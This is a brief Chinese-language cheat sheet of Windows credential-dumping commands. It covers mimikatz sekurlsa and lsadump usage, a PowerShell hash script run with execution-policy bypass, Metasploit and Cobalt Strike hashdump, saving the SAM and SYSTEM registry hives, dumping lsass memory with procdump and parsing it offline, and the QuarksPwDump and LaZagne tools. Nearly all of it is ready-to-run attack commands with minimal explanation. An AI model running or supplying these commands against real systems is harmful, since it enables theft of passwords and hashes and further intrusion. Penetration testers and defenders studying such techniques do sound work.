windows环境下抓密码总结
在线抓密码
1.mimikatz
privilege::debug
token::whoami
token::elevate
lsadump::sam
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
2.ps脚本
使用Get-PassHashes.ps1
powershell -exec bypass
Import-Module .\Get-PassHashes.PS1
Get-PassHashes
3.msf
上面拿到hash后其实可以用msf再hash传递
run hashdump
hashdump
post/windows/gather/credentials/domain_hashdump(获取域hash)
use mimikatz
wdigest(明文)
4.cs
拿到shell后使用hashdump, 普通user的权限是没法用的
需要Administrator权限
hashdump
logonpasswords
离线抓密码
1.SAM(卷影副本、注册表)
卷影副本:卷影副本,也称为快照,是存储在 Data Protection Manager (DPM) 服务器上的副本的时间点副本。副本是文件服务器上单个卷的受保护共享、文件夹和文件的完整时间点副本。
管理员状态下执行如下命令
reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
再把这两个文件移到mimikatz同一目录下
执行
lsadump::sam /sam:sam.hiv /system:system.hiv
2.lsass.exe(注入lsass.exe进程,并从其内存中提取)
执行如下命令:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
在有mimikatz和dmp文件的目录下运行cmd,执行如下命令
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
注:这两步都需要为管理员权限
3.手工导出lsass.dmp文件
使用任务管理器导出lsass.dmp文件
其他工具
1.QuarksPwDump
命令如下:
QuarksPwDump.exe –dhl -o hash.txt
2.lazagne.exe
命令如下
lazagne.exe windows